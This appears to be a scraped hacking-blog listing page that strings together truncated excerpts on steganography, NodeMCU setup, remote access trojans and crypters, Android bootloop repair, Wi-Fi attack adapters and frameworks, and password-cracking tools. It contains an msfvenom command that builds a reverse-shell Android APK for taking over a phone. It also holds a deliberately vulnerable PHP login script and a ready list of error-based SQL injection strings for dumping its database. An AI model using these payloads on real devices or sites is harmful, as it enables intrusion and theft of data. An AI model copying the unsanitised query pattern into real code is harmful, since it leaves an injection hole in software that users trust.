Gameplay

3/Gameplay/grid-small


 Video steganography approach enables hiding chunks of secret information inside video sequences. The features of video sequences including high capacity as well as complex structure make them more preferable for choosing as cover media over other media such as image, text, or audio. Video steganography is a prominent as well as the evolving field in the information security domain and significant number of video steganography methods are proposed in recent years. This article provides a comprehensive review of video steganography methods proposed in the literature.

Read More »

How to Hide File Behind Video (Steganography)

 

How to Hide File Behind Video (Steganography)








Read More »

NodeMCU ESP8266

 

          NodeMCU ESP8266




NodeMCU ESP8266 Development Kit is based on ESP-12E wifi module. It includes an onboard FTDI serial programmer, and a 3.3V regulator to power the ESP-12E module.

It is a sort of plug-and-play module. Just plug-in a USB cable, program the wifi module, and you are good to go.


NodeMCU ESP8266 Datasheet

  • Microcontroller: Tensilica 32-bit RISC CPU Xtensa LX106
  • Operating Voltage: 3.3V
  • Input Voltage: 7-12V
  • Digital I/O Pins (DIO): 16
  • Analog Input Pins (ADC): 1
  • UARTs: 1
  • SPIs: 1
  • I2Cs: 1
  • Flash Memory: 4 MB
  • SRAM: 64 KB
  • Clock Speed: 80 MHz
  • USB-TTL based on CP2102 is included onboard, Enabling Plug n Play
  • PCB Antenna
  • Small Sized module to fit smartly inside your IoT projects
  • Wi-Fi: Built-in 802.11 b/g/n

Now that’s all said and done. Let’s move onto the real programming the NodeMCU ESP8266 board using Arduino IDE.

Material Needed

For this tutorial, we will be flashing the onboard LED of the NodeMCU ESP8266 dev kit. So, let’s gear up:

  • A PC/Laptop running Windows/Linux
  • USB Type-A to Micro-B Cable
  • NodeMCU ESP8266-12E DevKit

ESP8266 with Arduino IDE

Looking at the popularity of the Arduino microcontroller, the simplest and easiest way to program NodeMCU ESP8266 Dev Kit is via Arduino IDE.

Considering the fact that Arduino IDE can be used on both the Windows/Linux, I will explain the steps to program the ESP8266 using both the operating systems.

STEP 1: Install CP2102 Driver

For Windows:

NodeMCU ESP8266-12E module contains an FTDI Serial Programmer. To use this programmer, you need to download and install the CP210x USB to UART Bridge VCP Driver from the official website of SilLabs:


Read More »

Open Source Rats

A remote access trojan (RAT, sometimes called creepware) is a type of malware that controls a system through a remote network connection. While desktop sharing and remote administration have many legal uses, “RAT” connotes criminal or malicious activity. A RAT is typically installed without the victim’s knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software and other anti-virus software.–Wikipedia


sigma male


On many underground forums, there is a lot of offers for RAT’s. There are cheap ones and some really expensive. Some of them are sold as service with monthly/yearly subscription. In most cases they do the same. Here are some example features:


Task Manager

File Manager

Startup Manager

Remote Desktop

Remote Shell

Remote Execution

System Information

Registry Editor

System Power Commands (Restart, Shutdown, Standby)

Keylogger (Unicode Support)

Reverse Proxy (SOCKS5)

Password Recovery (Common Browsers and FTP Clients)

Clipboard Text



RATs are typically client-server programs. Server part is located on hacker computer/server and client part is installed on victim computer. On the server, we can view the list of infected clients and manage them and perform all functions offered by RAT.


In server software you have option to build client with all your parameters, like server address, process name, option to detect virtual environment and sandboxes etc. Some of the RATs offer also crypters and binders. Crypters and binders can be also found as separate software.


A crypter is a software that is used to hide malware so that it is not easily detected by antivirus software. To perform its function, it can use encryption techniques and sometimes obfuscation. The crypter takes the executable file and obtains a new executable file which, when run, decrypts the encrypted code it contains and obtains the old original executable file.


File binders are utility software that allow a user to “bind” multiple files together resulting in a single executable. For example, you can merge your encrypted client file to a 7zip installation file, or an image, sound file etc.


RATs are written in various programming languages, offer different functions and are prepared for specific platforms.




Read More »

 


Step by step Tutorial

Generating a Payload with msfvenom

At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘192.168.0.112’. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.



After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command:

msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R> /var/www/html/ehacking.apk


  • -p indicates a payload type
  • android/metepreter/reverse_tcp specifies a reverse meterpreter shell would come in from a target Android device
  • LHOST is your local IP
  • LPORT is set to be as a listening port
  • R> /var/www/html would give the output directly on apache server
  • apk is the final name of the final output

This would take some time to generate an apk file of almost ten thousand bytes.



Read More »


Write an XSS Cookie Stealer in JavaScript to Steal Passwords


JavaScript is one of the most common languages used on the web. It can automate and animate website components, manage website content, and carry out many other useful functions from within a webpage. The scripting language also has many functions which can be used for malicious purposes, including stealing a user's cookies containing passwords and other information.

Cookies are information which a website requests or maintains regarding specific users which visit the page. These cookies contain information about how and when they visit, as well as authentication information for the site such as usernames and passwords. As these cookies must be in use whenever a visitor is active on a given website, an attacker who can intercept them can steal this information and use it to impersonate or catalog information about specific users.

It'spossible to utilize JavaScript in order to save or modify a user's cookies for a given domain. While this is usually applied in order to create and use cookies for interactive web development, if an attacker is able to maliciously view the same cookies, it becomes a valuable hacking technique. JavaScript-based attacks are especially effective when combined with tactics like code injection, as it allows malicious code to be executed on what appears to be an otherwise trusted website.

While we don't advocate stealing anyone's passwords, this guide is a must-know topic for any pentester or IT security professional to understand. If you don't know how black hat hackers do things, you'll never be able to catch them.

Creating an HTML Test Page

In order to steal cookies, a cookie must first be available on the web domain the user is viewing. This happens whenever the user views the website. While it's absolutely possible to inject JavaScript into websites using a man-in-the-middle attack, or by exploiting a vulnerable website, both of these would require additional effort to implement.

The test environment for our cookie will be within a fairly standard HTML index page. We will be able to embed all of our JavaScript elements inline. First, create a new directory to contain the HTML file. On a Linux or macOS system, we can use mkdir, as seen below.



Read More »

Dumping Database From Login Form

 Well the Trick is already discussed in earlier tutorials knowledge of those injections deeply is just enough to collect data from Login form. But just for a purpose of Tutorial and to open your mind towards this exploitation we are here discussing how to collect data from Login Form.





First of all there are Three ways of Achieving data from Login Forms.

1. Xpath Injection

2. Sub Query Injection

3. Blind Injection Both Techniques.


I strongly Suggest you to read them all as over here i wont be discussing in detail all these injections. As here we will discuss only some minor change in the injection and other things will remain same.


Same like Bypassing Login Form with SQL injection we will take a vulnerable Login script, and start exploring it.


$uname=$_POST['uname'];

$passwrd=$_POST['passwrd'];

$query="select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";

$result=mysql_query($query);

$rows = mysql_fetch_array($result);

if($rows)

{

echo "You have Logged in successfully" ;

create_session();

}

else  

{

Echo "Better Luck Next time";

}


Query

select username,pass from users where username='$uname' and password='$passwrd' limit 0,1

Injection

username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''=' username : " or extractvalue(0x0a,concat(0x0a,(select database()))) and ""=" username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) --+ username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --+ username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) # username : " or extractvalue(0x0a,concat(0x0a,(select database()))) # username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) -- username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --


you can leave the password field empty. If the Page is actually vulnerable then surely one of the above will work and we will continue with that. Now lets see what will the query passed. For the above given Query first injection will work



Read More »

Wireless Network Adapter Supports Monitor Mode & Packet Injection




  • Atheros AR9271: The Alfa AWUS036NHA is my favorite long-range network adapter and the standard by which I judge other long-range adapters. It's stable, fast, and a well-supported b/g/n wireless network adapter. There's also the TP-Link TL-WN722N, a favorite for newbies and experienced hackers alike. It's a compact b/g/n adapter that has one of the cheapest prices but boasts surprisingly impressive performance. That being said, only v1 will work with Kali Linux since v2 uses a different chipset.
  • Ralink RT3070: This chipset resides inside a number of popular wireless network adapters. Of those, the Alfa AWUS036NH is a b/g/n adapter with an absurd amount of range. It can be amplified by the omnidirectional antenna and can be paired with a Yagi or Paddle antenna to create a directional array. For a more discreet wireless adapter that can be plugged in via USB, the Alfa AWUS036NEH is a powerful b/g/n adapter that's slim and doesn't require a USB cable to use. It has the added advantage of retaining its swappable antenna. If you need a stealthier option that doesn't look like it could hack anything, you might consider the g/n Panda PAU05. While small, it's a low profile adapter with a strong performance in the short and medium range, a reduced range for when you want to gather network data without including everything within several blocks.
  • Ralink RT3572: While the previous adapters have been 2.4 GHz only, the Alfa AWUS051NH v2 is a dual-band adapter that is also compatible with 5 GHz networks. While slightly pricier, the dual-band capacity and compatibility with 802.11n draft 3.0 and 802.11a/b/g wireless standards make this a more advanced option.
  • Realtek 8187L (Wireless G adapters): The Alfa AWUS036H USB 2.4 GHz adapters use this older chipset that is less useful and will not pick up as many networks. These cards still will work against some networks, thus are great for beginners, as there are a ton around for cheap.
  • Realtek RTL8812AU: Supported in 2017, the Alfa AWUS036ACH is a beast, with dual antennas and 802.11ac and a, b, g, n compatibility with 300 Mbps at 2.4 GHz and 867 Mbps at 5 GHz. It's one of the newest offerings that are compatible with Kali, so if you're looking for the fastest and longest range, this would be an adapter to consider. To use it, you may need to first run "apt update" followed by "apt install realtek-rtl88xxau-dkms" which will install the needed drivers to enable packet injection.


Read More »

How to Fix Bootloop Issue on Android

 

How to Fix Bootloop Issue on Android



We’ve recently acquired one of the Nexus 6P phones that “died”, ended up in bootloop, and we decided to restore it. Bootloop issue is usually attributed to some hardware (dead cores, connector issues, etc) or software issue (e.g. corrupt files), causing the device (e.g. cellphone) to [re]boot, but failing every time to do so. There are some suggestions you can try:

– Soft ResetAndroid : Turn off the phone, remove the battery and wait for 5-10 minutes before powering it
– Factory Reset : Wipe everything, go into recovery mode and start everything from scratch
– Use some custom recovery like CWM (ClockWorkMode) or TWRP (TeamWinRecoveryProject)

Here we’re going to roughly cover a recovery via TWRP, for the sake of an example conducted on Nexus 6P cellphone with bootloop issue. Before we continue, we’ll list a few things you might need need:

– EX4_1_1_4Cores.zip : Elemental X kernel V4.11 for android 7.1.2, modified to use only 4 cores. EX kernel is faster, you can easily overclock the little cluster achieve more performance
– N2G48B_4Cores.img : boot.img from latest 7.1.2 firmware (modified to use only 4 cores

Bootloop Issue on Nexus 6P

The phone wouldn’t boot. Trying to go into recovery mode didn’t yield any results. It was stuck on some “no command” / android dead icon (either static or blinking/flashing).



Read More »

 

Cain and Abel: Well-Known Password Recovery Tool







Cain and Abel is very powerful and well-known tool for the password cracking and password recovery. According to official website, it is used over Windows operating systems. It allows its users to recover the passwords of various types by sniffing, brute-forcing, cracking encrypted passwords, etc.

Cain and Abel: Password Cracking & Password Recovery Tool

Cain and Abel is a tool built for windows to recover various kinds of passwords. It uses various techniques to recover passwords such as cracking encrypted passwords through dictionary, brute force attacks, sniffing the network recovering keys of wireless networks cryptanalysis attacks, recording VoIP, decoding scrambled passwords, revealing password boxes, examining routing protocols and revealing cached passwords. Cryptanalysis attacks are preformed using rainbow tables. Rainbow tables are generated with a program winrtgen.exe provided by the Cain and Abel package.



It is developed to help the people who lost their credentials. This password cracking and password recovery tool is very helpful for the network administrators, teachers, penetration testers, forensic department, security software companies and security professionals

Features:

  • Protected storage password manager
  • LSA Secrets Dumper
  • Service Manager
  • Route Table Manager
  • MAC Address Scanner with OUI fingerprint
  • Dialup Password Decoder
  • Full HTTPS sessions sniffer for APR
  • Full LDAPS sessions sniffer for APR
  • Wireless Scanner
  • WEP Cracking
  • ARP Spoofing
  • Network Password Sniffer
  • Password Crackers
  • And much more

Supported Platforms:

  • Windows

Requirements:

To install it, the following system requirements are needed.

  • 10MB hard disk space at least
  • Microsoft Windows 2000/2003/XP/Vista
  • Winpcap Packet Driver and Airpcap Packet Driver

Install Cain and Abel

First, you need to download the Cain and Abel. To download it, click on the “download” button below.

Now you can install it by running self-installing package.








Read More »

Framework For Wireless Pentesting – SniffAir

 

Framework For Wireless Pentesting – SniffAir




Introduction

SniffAir is an open-source wireless security framework which allows you to collect, manage and analyze wireless traffic. It also provides the ability to perform sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic, looking for potential security flaws or malicious traffic.


SniffAir: Open-source Wireless Security Framework

Along with the prebuilt queries, SniffAir allows you to create custom queries for analyzing the wireless data which will be stored in the SQL database. These queries will extract data for wireless penetration test reports. The data can also be leveraged in setting up wireless attacks included in SniffAir as modules. It can perfom automated bruteforcing on EAP and PSK networks, fake portal based phishing attack, evil twin attack, etc.


SniffAir Modules:

Auto EAP – Automated Brute-Force Login Attack Against EAP Networks

Auto PSK – Automated Brute-Force Passphrase Attack Against PSK Networks

AP Hunter – Discover Access Point Within a Certain Range Using a Specific Type of Encrpytion

Captive Portal – Web Based Login Portal to Capture User Entered Credentials (Runs as an OPEN Network)

Certificate Generator – Generates a Certificate Used by Evil Twin Attacks

Exporter – Exports Data Stored in a Workspace to a CSV File

Evil Twin – Creates a Fake Access Point, Clients Connect to Divulging MSCHAP Hashes or Cleartext Passwords

Handshaker – Parses Database or .pcapdump Files Extracting the Pre-Shared Handshake for Password Guessing (Hashcat or JTR Format)

Mac Changer – Changes The Mac Address of an Interface

Probe Packet – Sends Out Deauth Packets Targeting SSID(s)

Proof Packet – Parses Database or .pcapdump Files Extracting all Packets Related to the Inscope SSDIS

Hidden SSID – Discovers the Names of HIDDEN SSIDS

Suspicious AP – Looks for Access Points that: Is On Different Channel, use a Different Vendor or Encrpytion Type Then the Rest of The Network

Wigle Search SSID – Queries wigle for SSID (i.e. Bob’s wifi)

Wigle Search MAC – Queries wigle for all observations of a single mac address


Install

SniffAir was developed with Python 2.7. Tested and supported on:

Clone it from the github repo:

$ git clone https://github.com/Tylous/SniffAir.git

To install, run the following:

$./setup.sh

Usage

To run SniffAir:

$ ./SniffAir.py

Type help to list available commands:








Read More »

Ehtools: Entynet Hacker Tools

 Ehtools: Entynet Hacker Tools

With the popularity and number of Wi-Fi tools increasing among beginners, Ehtools is a framework which allows the user to easily access these tools from a single platform. The simple but powerful tool can be used for a wide range of functions from installing new add-ons to viewing information about the target. Lastly, it is easy to install and run.

Features:

  • More than 58 tools included within this framework.
  • Automation and streamlining of processes saves valuable time of even the most experienced penetration tester
  • Option to upgrade to the ‘PRO’ version
  • Simple UI for easy navigation
  • Ability to install tools depending on the user’s requirements.
  • Range of functions from attacking wi-fi networks, remote access to website attack tools.
  • Renowned tools ‘Metasploit’ and ‘Wireshark’ are included 

Ehtools Utilities:

ehtmod

– Ehtools Modules: an utility that adds permissions or the ability to control the Framework modules.

ehtkey

– Ehtools key: an utility that allows you to change your config key (ehtools config/boot key) and rewrite /etc/ehtools/.config.

ehtapp

– Ehtools application: an utility that allows you to configure application, for example creating desktop application.

epasswd

– Ehtools password changer: an utility that allows you to change your login and pass or ehtools root 

Supported Platforms:

Requirements:

  • Full root access

Install

Clone the GitHub repo: git clone https://github.com/entynetproject/ehtools.git


Navigate to the working directory and install the requirements:

$ cd ehtools
$ chmod +x install.sh
$ ./install.sh

Usage

Enter the following command:

$ ehtools


Read More »